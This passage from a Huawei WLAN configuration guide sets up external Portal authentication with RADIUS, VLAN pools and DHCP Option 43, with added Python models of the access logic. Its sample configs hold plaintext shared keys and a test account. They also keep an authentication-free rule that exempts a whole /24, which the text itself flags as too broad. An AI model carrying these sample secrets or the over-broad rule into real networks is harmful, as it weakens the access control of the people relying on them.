l In this example, Switch_A is a Huawei modular switch, and Switch_B is a Huawei fixed switch.
l When a VLAN pool is used to provide service VLANs on a large network, many VLANs are usually
added to the VLAN pool, and interfaces of many devices need to be added to these VLANs. In this
situation, a lot of broadcast domains are created if you configure the direct forwarding mode. To
reduce the number of broadcast domains, set the data forwarding mode to tunnel forwarding.
l Configurations of RADIUS server parameters and Portal server parameters must be the same as the
configurations on the peer RADIUS server and Portal server. Configure the parameters as required.
l To ensure that the router and servers can communicate with each other, configure routes on the
RADIUS server and Portal server to the router.

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure basic WLAN services so that the AC can communicate with upper-layer and
lower-layer devices and the AP can go online.
2. Configure RADIUS authentication parameters.
3. Configure a Portal server profile.
4. Configure a Portal access profile to manage access control parameters for Portal
authentication users.
5. Configure an authentication-free rule profile so that the AC allows packets to the DNS
server to pass through.
6. Configure an authentication profile to manage NAC configuration.
7. Configure WLAN service parameters for STAs to access the WLAN.
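How the pieces in roadmap items 3 to 6 act on a STA's traffic, as an added example that is not Huawei's code: before authentication only the Portal server (active authentication) and the authentication-free resource of default_free_rule (the DNS server 172.16.1.2) are reachable, plain HTTP to anything else is redirected to the Portal page (forcible authentication), and everything else is dropped until the Portal login succeeds. The Portal login URL, the redirect query format, and the STA MACs and destination addresses used in the test are assumptions constructed for illustration.

```python
"""Added example (not Huawei's code): a model of the per-STA access state the
AC keeps for a VAP bound to authentication profile p1.  Data-plan values:
Portal server 172.16.1.1, authentication-free DNS server 172.16.1.2.  The
login URL and redirect format are assumptions."""
from dataclasses import dataclass
from urllib.parse import quote

PORTAL_SERVER = "172.16.1.1"                      # Portal server profile abc
PORTAL_LOGIN_URL = "http://172.16.1.1/portal"     # assumed URL, not in the data plan
FREE_DESTINATIONS = {"172.16.1.2"}                # default_free_rule: the DNS server
HTTP_PORT = 80


@dataclass
class Packet:
    src_mac: str
    dst_ip: str
    proto: str          # "tcp" or "udp"
    dst_port: int
    http_host: str = ""
    http_path: str = "/"


class PortalGate:
    """Decides permit / redirect / drop for each STA packet."""

    def __init__(self, portal_server=PORTAL_SERVER, free_destinations=FREE_DESTINATIONS):
        self.portal_server = portal_server
        self.free_destinations = set(free_destinations)
        self.authenticated = set()          # MACs whose Portal login succeeded

    def login_result(self, mac, accepted):
        """Called when the Portal/RADIUS exchange for a STA finishes."""
        if accepted:
            self.authenticated.add(mac)
        else:
            self.authenticated.discard(mac)

    def logout(self, mac):
        self.authenticated.discard(mac)

    def decide(self, pkt):
        """Return (action, redirect_url); action is 'permit', 'redirect' or 'drop'."""
        if pkt.src_mac in self.authenticated:
            return ("permit", None)
        # Pre-authentication: the Portal server itself (active authentication) and
        # authentication-free resources (DNS, so host names still resolve) are reachable.
        if pkt.dst_ip == self.portal_server or pkt.dst_ip in self.free_destinations:
            return ("permit", None)
        # Forcible authentication: plain HTTP to anything else is answered with a
        # redirect to the Portal page that carries the originally requested URL.
        if pkt.proto == "tcp" and pkt.dst_port == HTTP_PORT:
            original = "http://%s%s" % (pkt.http_host, pkt.http_path)
            return ("redirect", "%s?url=%s" % (PORTAL_LOGIN_URL, quote(original, safe="")))
        # Everything else (HTTPS, other TCP/UDP) is dropped until the STA authenticates.
        return ("drop", None)
```

The DNS entry in the authentication-free rule is what makes forcible authentication usable: without it the STA cannot resolve the name it typed, never issues the HTTP request, and therefore never sees the redirect. Keeping the free list to exactly the Portal and DNS addresses is also what limits what an unauthenticated STA can reach.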

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure networking
parameters.

# Configure access switch Switch_A. Add GE0/0/1 to GE0/0/5 to VLAN 100 (management
VLAN). Interfaces GE0/0/1 to GE0/0/4 have the same configuration. GE0/0/1 is used as an
example here.
<HUAWEI> system-view
[HUAWEI] sysname Switch_A
[Switch_A] vlan batch 100
[Switch_A] interface gigabitethernet 0/0/1
[Switch_A-GigabitEthernet0/0/1] port link-type trunk
[Switch_A-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_A-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[Switch_A-GigabitEthernet0/0/1] port-isolate enable
[Switch_A-GigabitEthernet0/0/1] quit
[Switch_A] interface gigabitethernet 0/0/5
[Switch_A-GigabitEthernet0/0/5] port link-type trunk
[Switch_A-GigabitEthernet0/0/5] port trunk allow-pass vlan 100
[Switch_A-GigabitEthernet0/0/5] quit

# Configure aggregation switch Switch_B. Add GE1/0/1 to VLAN 100, GE1/0/2 to VLANs
101, 102, and 200, and GE1/0/3 to VLAN 201.
<HUAWEI> system-view
[HUAWEI] sysname Switch_B
[Switch_B] vlan batch 100 101 102 200 201
[Switch_B] interface gigabitethernet 1/0/1
[Switch_B-GigabitEthernet1/0/1] port link-type trunk
[Switch_B-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[Switch_B-GigabitEthernet1/0/1] quit
[Switch_B] interface gigabitethernet 1/0/2
[Switch_B-GigabitEthernet1/0/2] port link-type trunk
[Switch_B-GigabitEthernet1/0/2] port trunk allow-pass vlan 101 102 200
[Switch_B-GigabitEthernet1/0/2] quit
[Switch_B] interface gigabitethernet 1/0/3
[Switch_B-GigabitEthernet1/0/3] port link-type trunk
[Switch_B-GigabitEthernet1/0/3] port trunk allow-pass vlan 201
[Switch_B-GigabitEthernet1/0/3] quit

# Create VLANIF interfaces VLANIF 100 to VLANIF 102, VLANIF 200, and VLANIF 201
on Switch_B and configure their IP addresses. VLANIF 100 works as the gateway of APs.
VLANIF 101 and VLANIF 102 are gateways of STAs. Switch_B uses VLANIF 200 to
communicate with the AC and VLANIF 201 to communicate with the router.
[Switch_B] interface vlanif 100
[Switch_B-Vlanif100] ip address 10.23.100.1 24
[Switch_B-Vlanif100] quit
[Switch_B] interface vlanif 101
[Switch_B-Vlanif101] ip address 10.23.101.1 24
[Switch_B-Vlanif101] quit
[Switch_B] interface vlanif 102
[Switch_B-Vlanif102] ip address 10.23.102.1 24
[Switch_B-Vlanif102] quit
[Switch_B] interface vlanif 200
[Switch_B-Vlanif200] ip address 10.45.200.2 24
[Switch_B-Vlanif200] quit
[Switch_B] interface vlanif 201
[Switch_B-Vlanif201] ip address 10.67.201.2 24
[Switch_B-Vlanif201] quit

# On the AC, add GE1/0/1 connected to Switch_B to VLAN 101, VLAN 102, and VLAN
200.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 101 102 200
[AC] interface vlanif 200
[AC-Vlanif200] ip address 10.45.200.1 24
[AC-Vlanif200] quit
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 101 102 200
[AC-GigabitEthernet1/0/1] quit

# Add GE2/0/0 on the router to VLAN 201 and configure an IP address for VLANIF 201 so
that the router can communicate with Switch_B.
<Huawei> system-view
[Huawei] sysname Router
[Router] vlan batch 201
[Router] interface vlanif 201
[Router-Vlanif201] ip address 10.67.201.1 24
[Router-Vlanif201] quit
[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 201
[Router-GigabitEthernet2/0/0] quit

# On the router, configure a route to Switch_B.


[Router] ip route-static 10.23.100.0 24 10.67.201.2
[Router] ip route-static 10.23.101.0 24 10.67.201.2
[Router] ip route-static 10.23.102.0 24 10.67.201.2

# Configure a default route on Switch_B with the outbound interface as the router's VLANIF
201.
[Switch_B] ip route-static 0.0.0.0 0.0.0.0 10.67.201.1

# Configure routes from the AC to APs with the next hop as Switch_B's VLANIF 200.
[AC] ip route-static 10.23.100.0 24 10.45.200.2

Step 2 Configure a DHCP server to assign IP addresses to APs and STAs.


# Configure Switch_B as a DHCP relay agent.
[Switch_B] dhcp enable
[Switch_B] interface vlanif 100
[Switch_B-Vlanif100] dhcp select relay
[Switch_B-Vlanif100] dhcp relay server-ip 10.67.201.1
[Switch_B-Vlanif100] quit
[Switch_B] interface vlanif 101
[Switch_B-Vlanif101] dhcp select relay
[Switch_B-Vlanif101] dhcp relay server-ip 10.67.201.1
[Switch_B-Vlanif101] quit
[Switch_B] interface vlanif 102
[Switch_B-Vlanif102] dhcp select relay
[Switch_B-Vlanif102] dhcp relay server-ip 10.67.201.1
[Switch_B-Vlanif102] quit

# Configure the router as a DHCP server to assign IP addresses to APs and STAs.

NOTE
In this example, the AP and AC are on different network segments. To notify the AP of the AC's IP address
so that the AP can go online at Layer 3, configure Option 43 in the address pool used by the AP.
[Router] dhcp enable
[Router] ip pool ap
[Router-ip-pool-ap] network 10.23.100.0 mask 24
[Router-ip-pool-ap] gateway-list 10.23.100.1
[Router-ip-pool-ap] option 43 sub-option 3 ascii 10.45.200.1
[Router-ip-pool-ap] quit
[Router] ip pool sta1
[Router-ip-pool-sta1] network 10.23.101.0 mask 24
[Router-ip-pool-sta1] gateway-list 10.23.101.1
[Router-ip-pool-sta1] dns-list 172.16.1.2
[Router-ip-pool-sta1] quit
[Router] ip pool sta2
[Router-ip-pool-sta2] network 10.23.102.0 mask 24
[Router-ip-pool-sta2] gateway-list 10.23.102.1
[Router-ip-pool-sta2] dns-list 172.16.1.2
[Router-ip-pool-sta2] quit
[Router] interface vlanif 201
[Router-Vlanif201] dhcp select global
[Router-Vlanif201] quit
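The value behind the router's option 43 sub-option 3 ascii 10.45.200.1 line, as an added example that is not Huawei's code: it builds the Option 43 TLV that tells an AP on the 10.23.100.0/24 segment where the AC's source interface (VLANIF 200, 10.45.200.1) is, parses it the way an AP would, and checks a captured DHCP offer against the expected AC address. The nesting (sub-option code, one-byte length, ASCII value inside option 43) is an assumption about the wire format, and the alternative address in the test is constructed.

```python
"""Added example (not Huawei's code): encoding and checking the DHCP Option 43
value configured on the router so that APs can discover the AC across Layer 3.
The TLV layout is an assumption; EXPECTED_AC is the data-plan AC address."""
import ipaddress
import struct

OPTION_VENDOR_SPECIFIC = 43
SUB_OPTION_AC_IP_ASCII = 3          # what "option 43 sub-option 3 ascii" configures
EXPECTED_AC = ["10.45.200.1"]       # AC source interface VLANIF 200 (data plan)


def encode_option43(ac_ips):
    """option 43 = [43][len][ [3][len]["ip1,ip2,..."] ]  (layout assumed)"""
    for ip in ac_ips:
        ipaddress.IPv4Address(ip)                       # reject anything that is not IPv4
    value = ",".join(ac_ips).encode("ascii")
    sub = struct.pack("!BB", SUB_OPTION_AC_IP_ASCII, len(value)) + value
    if len(sub) > 255:
        raise ValueError("option 43 payload exceeds a one-byte length")
    return struct.pack("!BB", OPTION_VENDOR_SPECIFIC, len(sub)) + sub


def decode_option43(raw):
    """Parse option 43 into {sub_option_code: value}, refusing truncated data."""
    if len(raw) < 2 or raw[0] != OPTION_VENDOR_SPECIFIC:
        raise ValueError("not an option 43 TLV")
    if raw[1] != len(raw) - 2:
        raise ValueError("option length does not match data")
    body, i, subs = raw[2:], 0, {}
    while i < len(body):
        if i + 2 > len(body):
            raise ValueError("truncated sub-option header")
        code, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated sub-option value")
        subs[code] = value
        i += 2 + length
    return subs


def ac_addresses(raw):
    """AC IP list an AP would extract; a malformed address raises ValueError."""
    subs = decode_option43(raw)
    if SUB_OPTION_AC_IP_ASCII not in subs:
        return []
    text = subs[SUB_OPTION_AC_IP_ASCII].decode("ascii")
    return [str(ipaddress.IPv4Address(p.strip())) for p in text.split(",") if p.strip()]


def is_well_formed(raw):
    try:
        ac_addresses(raw)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


def advertises_expected_ac(raw, expected=EXPECTED_AC):
    """Monitoring check: does a captured DHCP offer steer APs only to our AC?"""
    return is_well_formed(raw) and set(ac_addresses(raw)) == set(expected)
```

An AP accepts whatever AC address the DHCP offer carries, so the same parser doubles as a check on captured offers for the AP segment: any offer whose option 43 names an address other than the AC's source interface is a misconfiguration or a foreign DHCP server and is worth alerting on.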

Step 3 Configure a VLAN pool for service VLANs.

# Create a VLAN pool, add VLAN 101 and VLAN 102 to the pool, and set the VLAN
assignment algorithm to hash in the VLAN pool.

NOTE

This example uses the hash assignment algorithm, which is also the default; if the default is retained, you do not need to run the assignment hash command.
Only VLAN 101 and VLAN 102 are added to the VLAN pool here, but a pool can contain many VLANs. For every VLAN you add, create the corresponding VLANIF interface with an IP address on Switch_B and an address pool on the router, as was done for VLAN 101 and VLAN 102.
[AC] vlan pool sta-pool
[AC-vlan-pool-sta-pool] vlan 101 102
[AC-vlan-pool-sta-pool] assignment hash
[AC-vlan-pool-sta-pool] quit

Step 4 Configure the APs to go online.

# Create AP groups guest and employee.


[AC] wlan
[AC-wlan-view] ap-group name guest
[AC-wlan-ap-group-guest] quit
[AC-wlan-view] ap-group name employee
[AC-wlan-ap-group-employee] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name guest
[AC-wlan-ap-group-guest] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-guest] quit
[AC-wlan-view] ap-group name employee
[AC-wlan-ap-group-employee] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-employee] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 200

# Import the APs offline on the AC. Add APs deployed in the lobby to AP group guest and
APs in office areas to AP group employee. Configure names for the APs based on the APs'
deployment locations, so that you can know where the APs are deployed from their names.
For example, if the AP with MAC address 60de-4474-9640 is deployed in room 1 of the
second floor of the office building, name the AP office2-1.


NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name lobby-1
[AC-wlan-ap-0] ap-group guest
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
[AC-wlan-view] ap-id 1 ap-mac 60de-4476-e380
[AC-wlan-ap-1] ap-name lobby-2
[AC-wlan-ap-1] ap-group guest
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit
[AC-wlan-view] ap-id 2 ap-mac 60de-4474-9640
[AC-wlan-ap-2] ap-name office2-1
[AC-wlan-ap-2] ap-group employee
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-2] quit
[AC-wlan-view] ap-id 3 ap-mac 60de-4474-9660
[AC-wlan-ap-3] ap-name office2-2
[AC-wlan-ap-3] ap-group employee
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-3] quit
[AC-wlan-view] quit

# After an AP is powered on, run the display ap all command to check the AP state. If the
State field displays nor, the AP has gone online.
[AC] display ap all
Total AP information:
nor : normal [4]
-------------------------------------------------------------------------------------------
ID  MAC             Name       Group     IP             Type          State  STA  Uptime
-------------------------------------------------------------------------------------------
0   60de-4476-e360  lobby-1    guest     10.23.100.254  AP6010DN-AGN  nor    0    2H:29M:29S
1   60de-4476-e380  lobby-2    guest     10.23.100.252  AP6010DN-AGN  nor    0    2H:34M:11S
2   60de-4474-9640  office2-1  employee  10.23.100.253  AP6010DN-AGN  nor    0    2H:30M:1S
3   60de-4474-9660  office2-2  employee  10.23.100.251  AP6010DN-AGN  nor    0    2H:35M:2S
-------------------------------------------------------------------------------------------
Total: 4

Step 5 Configure a RADIUS server template, and a RADIUS authentication scheme.


# Configure a RADIUS server template.
[AC] radius-server template radius_huawei
[AC-radius-radius_huawei] radius-server authentication 172.16.1.1 1812

[AC-radius-radius_huawei] radius-server shared-key cipher Huawei@123
[AC-radius-radius_huawei] quit

# Configure a RADIUS authentication scheme.


[AC] aaa
[AC-aaa] authentication-scheme radius_huawei
[AC-aaa-authen-radius_huawei] authentication-mode radius
[AC-aaa-authen-radius_huawei] quit

# Create an AAA domain and configure the RADIUS server template and authentication
scheme.
[AC-aaa] domain huawei.com
[AC-aaa-domain-huawei.com] radius-server radius_huawei
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

Step 6 Configure a Portal server profile.


[AC] web-auth-server abc
[AC-web-auth-server-abc] server-ip 172.16.1.1
[AC-web-auth-server-abc] shared-key cipher Admin@123
[AC-web-auth-server-abc] port 50200
[AC-web-auth-server-abc] url https://172.16.1.1:8443/webauth
[AC-web-auth-server-abc] quit

Step 7 Configure the Portal access profile portal1.


[AC] portal-access-profile name portal1
[AC-portal-access-profile-portal1] web-auth-server abc layer3
[AC-portal-access-profile-portal1] quit

Step 8 Configure an authentication-free rule profile so that STAs can reach the DNS server before they authenticate.

NOTE
mask 24 exempts the whole 172.16.1.0/24 segment from authentication, not only the DNS server; that segment also contains the RADIUS/Portal server 172.16.1.1 and any other host placed there. If only the DNS server should be reachable before authentication, use mask 32 instead.

[AC] free-rule-template name default_free_rule
[AC-free-rule-default_free_rule] free-rule 1 destination ip 172.16.1.2 mask 24
[AC-free-rule-default_free_rule] quit
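To see exactly what the mask in free-rule 1 exempts, the following Python block (an added example, not Huawei code) evaluates authentication-free rules against destination addresses, with the rule as configured above beside a host-only version. Its matching semantics, destination address ANDed with the mask and first matching rule wins, are an assumption for illustration; the addresses are the ones from this example.

```python
"""Evaluate Portal authentication-free rules of the form
`free-rule N destination ip A.B.C.D mask M` against destinations.

Added example, not Huawei code. Assumed semantics: a destination is
exempt when it falls inside (ip AND mask); the first matching rule wins.
"""
import ipaddress


def make_rule(rule_id, dst_ip, mask):
    """mask may be a prefix length (24) or a dotted mask (255.255.255.0),
    both of which appear in this document."""
    net = ipaddress.IPv4Network(f"{dst_ip}/{mask}", strict=False)
    return {"id": rule_id, "network": net}


def is_authentication_free(dst_ip, rules):
    """Return the id of the first rule exempting dst_ip, or None."""
    addr = ipaddress.IPv4Address(dst_ip)
    for rule in rules:
        if addr in rule["network"]:
            return rule["id"]
    return None


def exempted_hosts(rules):
    """Number of destination addresses reachable without authenticating."""
    return sum(r["network"].num_addresses for r in rules)


# Rule as configured in the example above: DNS server 172.16.1.2, mask 24
RULES_AS_CONFIGURED = [make_rule(1, "172.16.1.2", 24)]
# Narrowed to the single DNS host
RULES_HOST_ONLY = [make_rule(1, "172.16.1.2", 32)]

if __name__ == "__main__":
    for name, rules in (("mask 24", RULES_AS_CONFIGURED), ("mask 32", RULES_HOST_ONLY)):
        print(name,
              "DNS 172.16.1.2 exempt:", is_authentication_free("172.16.1.2", rules),
              "RADIUS/Portal 172.16.1.1 exempt:", is_authentication_free("172.16.1.1", rules),
              "addresses exempt:", exempted_hosts(rules))
```

With mask 24 the rule exempts 256 addresses, including the RADIUS/Portal server; with mask 32 it exempts the DNS server alone, which is the least-privilege form of the same rule.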

Step 9 Configure the authentication profile p1.


[AC] authentication-profile name p1
[AC-authen-profile-p1] portal-access-profile portal1
[AC-authen-profile-p1] free-rule-template default_free_rule
[AC-authen-profile-p1] access-domain huawei.com portal force
[AC-authen-profile-p1] quit

Step 10 Configure WLAN service parameters.


# Create security profile wlan-security and set the security policy in the profile. By default,
the security policy is open system.
[AC] wlan
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profiles guest and employee, and set the SSID names to guest and employee,
respectively.
[AC-wlan-view] ssid-profile name guest
[AC-wlan-ssid-prof-guest] ssid guest
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-guest] quit
[AC-wlan-view] ssid-profile name employee
[AC-wlan-ssid-prof-employee] ssid employee
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-employee] quit

# Create VAP profiles guest and employee, set the data forwarding mode and service
VLANs, and apply the security profiles and SSID profiles to the VAP profiles.

[AC-wlan-view] vap-profile name guest
[AC-wlan-vap-prof-guest] forward-mode tunnel
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-guest] service-vlan vlan-pool sta-pool
[AC-wlan-vap-prof-guest] security-profile wlan-security
[AC-wlan-vap-prof-guest] ssid-profile guest
[AC-wlan-vap-prof-guest] authentication-profile p1
[AC-wlan-vap-prof-guest] quit
[AC-wlan-view] vap-profile name employee
[AC-wlan-vap-prof-employee] forward-mode tunnel
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-employee] service-vlan vlan-pool sta-pool
[AC-wlan-vap-prof-employee] security-profile wlan-security
[AC-wlan-vap-prof-employee] ssid-profile employee
[AC-wlan-vap-prof-employee] authentication-profile p1
[AC-wlan-vap-prof-employee] quit

# Bind VAP profiles to the AP groups and apply the VAP profiles to radio 0 and radio 1 of the
APs.
[AC-wlan-view] ap-group name guest
[AC-wlan-ap-group-guest] vap-profile guest wlan 1 radio 0
[AC-wlan-ap-group-guest] vap-profile guest wlan 1 radio 1
[AC-wlan-ap-group-guest] quit
[AC-wlan-view] ap-group name employee
[AC-wlan-ap-group-employee] vap-profile employee wlan 1 radio 0
[AC-wlan-ap-group-employee] vap-profile employee wlan 1 radio 1
[AC-wlan-ap-group-employee] quit

Step 11 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 12 Verify the configuration.


l After the configuration is complete, the WLAN with the SSID guest is available for
STAs in the lobby and the WLAN with the SSID employee is available for STAs in
office areas.
l The STAs obtain IP addresses when they successfully associate with the WLAN.
l When a user opens the browser and attempts to access the network, the user is
automatically redirected to the authentication page provided by the external Portal server.
After entering the correct user name and password on the page, the user can access the
network.

----End

Configuration Files
l Configuration file of Switch_A
#
sysname Switch_A
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
port-isolate enable group 1
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
port-isolate enable group 1
#
interface GigabitEthernet0/0/4
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
port-isolate enable group 1
#
interface GigabitEthernet0/0/5
port link-type trunk
port trunk allow-pass vlan 100
#
return
l Configuration file of Switch_B
#
sysname Switch_B
#
vlan batch 100 to 102 200 201
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.67.201.1
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.67.201.1
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.67.201.1
#
interface Vlanif200
ip address 10.45.200.2 255.255.255.0
#
interface Vlanif201
ip address 10.67.201.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 101 to 102 200
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 201
#
ip route-static 0.0.0.0 0.0.0.0 10.67.201.1
#
return
l Configuration file of the router
#
sysname Router
#
vlan batch 201
#
dhcp enable
#
ip pool ap
gateway-list 10.23.100.1
network 10.23.100.0 mask 255.255.255.0
option 43 sub-option 3 ascii 10.45.200.1
#
ip pool sta1
gateway-list 10.23.101.1
network 10.23.101.0 mask 255.255.255.0
dns-list 172.16.1.2
#
ip pool sta2
gateway-list 10.23.102.1
network 10.23.102.0 mask 255.255.255.0
dns-list 172.16.1.2
#
interface Vlanif201
ip address 10.67.201.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 201
#
ip route-static 10.23.100.0 255.255.255.0 10.67.201.2
ip route-static 10.23.101.0 255.255.255.0 10.67.201.2
ip route-static 10.23.102.0 255.255.255.0 10.67.201.2
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 101 to 102 200
#
authentication-profile name p1
portal-access-profile portal1
free-rule-template default_free_rule
access-domain huawei.com portal force
#
vlan pool sta-pool
vlan 101 to 102
#
radius-server template radius_huawei
radius-server shared-key cipher %^%#Ug1l9V#SI(JTFp+*)J7<%CUQB(74-4vSIKO!x:NI%^%#
radius-server authentication 172.16.1.1 1812 weight 80
#
free-rule-template name default_free_rule
free-rule 1 destination ip 172.16.1.2 mask 255.255.255.0
#
web-auth-server abc
server-ip 172.16.1.1
port 50200
shared-key cipher %^%#4~ZXE3]6@BXu;2;aw}hA{rSb,@"L@T#e{%6G1AiD%^%#
url https://172.16.1.1:8443/webauth
#
portal-access-profile name portal1
web-auth-server abc layer3
#
aaa
authentication-scheme radius_huawei
authentication-mode radius
domain huawei.com
authentication-scheme radius_huawei
radius-server radius_huawei
#
interface Vlanif200
ip address 10.45.200.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 101 to 102 200
#
ip route-static 10.23.100.0 255.255.255.0 10.45.200.2
#
capwap source interface vlanif200
#
wlan
security-profile name wlan-security
ssid-profile name guest
ssid guest
ssid-profile name employee
ssid employee
vap-profile name guest
forward-mode tunnel
service-vlan vlan-pool sta-pool
ssid-profile guest
security-profile wlan-security
authentication-profile p1
vap-profile name employee
forward-mode tunnel
service-vlan vlan-pool sta-pool
ssid-profile employee
security-profile wlan-security
authentication-profile p1
regulatory-domain-profile name domain1
ap-group name guest
regulatory-domain-profile domain1
radio 0
vap-profile guest wlan 1
radio 1
vap-profile guest wlan 1
ap-group name employee
regulatory-domain-profile domain1
radio 0
vap-profile employee wlan 1
radio 1
vap-profile employee wlan 1
ap-id 0 ap-mac 60de-4476-e360
ap-name lobby-1
ap-group guest
ap-id 1 ap-mac 60de-4476-e380
ap-name lobby-2
ap-group guest
ap-id 2 ap-mac 60de-4474-9640
ap-name office2-1
ap-group employee
ap-id 3 ap-mac 60de-4474-9660
ap-name office2-2
ap-group employee
#
return

16.8 Example for Configuring MAC Address-prioritized Portal Authentication

MAC Address-Prioritized Portal Authentication
In MAC address-prioritized Portal authentication, the access device first submits the terminal's MAC address to the RADIUS server for identity authentication (MAC address authentication). Only if that fails does the Portal server push the Portal authentication page to the terminal, where the user enters a user name and password. The RADIUS server caches a terminal's MAC address when the terminal passes Portal authentication for the first time. If the terminal disconnects and reconnects within the MAC address validity period, the RADIUS server finds the MAC address in its cache and admits the terminal without prompting again. During that period the cached MAC address, not the user, is what is being authenticated, so any terminal presenting that MAC address is admitted as that user; keep the validity period as short as the service allows.
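The decision sequence just described, as an added Python example rather than Huawei code. The RADIUS server is a constructed stand-in: its MAC cache is a dict of MAC user name to expiry time, the validity period is the 60 minutes used in this example's networking requirements, and the MAC user name is the MAC address without hyphens, as the MAC access profile note later in this example states. The account test/Huawei2012 is the test account this example uses on its RADIUS server.

```python
"""Simulate MAC address-prioritized Portal authentication: MAC
authentication against the RADIUS MAC cache first, Portal login only
when that fails, and the cache entry created by a Portal success.

Added example, not Huawei code. Assumptions: cache = {mac user: expiry},
60-minute validity period, MAC user name = MAC without hyphens.
"""
from dataclasses import dataclass, field

VALIDITY_SECONDS = 60 * 60   # 60-minute MAC address validity period (assumed)


def mac_username(mac):
    """MAC access profile: user name and password are the MAC without hyphens."""
    return mac.lower().replace("-", "").replace(":", "")


@dataclass
class RadiusServer:
    """Constructed stand-in for the RADIUS/Portal server (192.168.2.30)."""
    accounts: dict                                    # user -> password
    mac_cache: dict = field(default_factory=dict)     # mac user -> expiry

    def mac_auth(self, mac_user, now):
        """MAC authentication succeeds only for an unexpired cache entry."""
        expiry = self.mac_cache.get(mac_user)
        return expiry is not None and now < expiry

    def portal_auth(self, user, password, mac_user, now):
        """Portal login; on success the terminal's MAC is cached."""
        if self.accounts.get(user) != password:
            return False
        self.mac_cache[mac_user] = now + VALIDITY_SECONDS
        return True


def access_decision(server, mac, now, credentials=None):
    """Return which step admitted the STA, or 'portal-required'."""
    mac_user = mac_username(mac)
    if server.mac_auth(mac_user, now):
        return "allowed-by-mac"
    if credentials and server.portal_auth(*credentials, mac_user, now):
        return "allowed-by-portal"
    return "portal-required"


def demo():
    """Walk one STA through first login, reconnect, and cache expiry."""
    srv = RadiusServer(accounts={"test": "Huawei2012"})
    sta = "60de-4476-e360"                       # constructed STA MAC
    return [
        access_decision(srv, sta, now=0),        # first association: no cache entry
        access_decision(srv, sta, now=0, credentials=("test", "Huawei2012")),
        access_decision(srv, sta, now=30 * 60),  # reconnect after 30 min: MAC hit
        access_decision(srv, sta, now=61 * 60),  # reconnect after 61 min: expired
    ]


if __name__ == "__main__":
    print(demo())
```

Note what the third step shows: within the validity period nothing is checked except the MAC address, so a terminal that spoofs 60de-4476-e360 during that hour is admitted as user test. The validity period is therefore a security parameter, not only a convenience one.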

Configuration Notes
l In this example, MAC address authentication is used. To ensure network security,
configure an appropriate security policy according to your network requirements.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to
APs. Without port isolation, large numbers of broadcast packets are flooded in the
VLANs, and WLAN users on different APs can communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
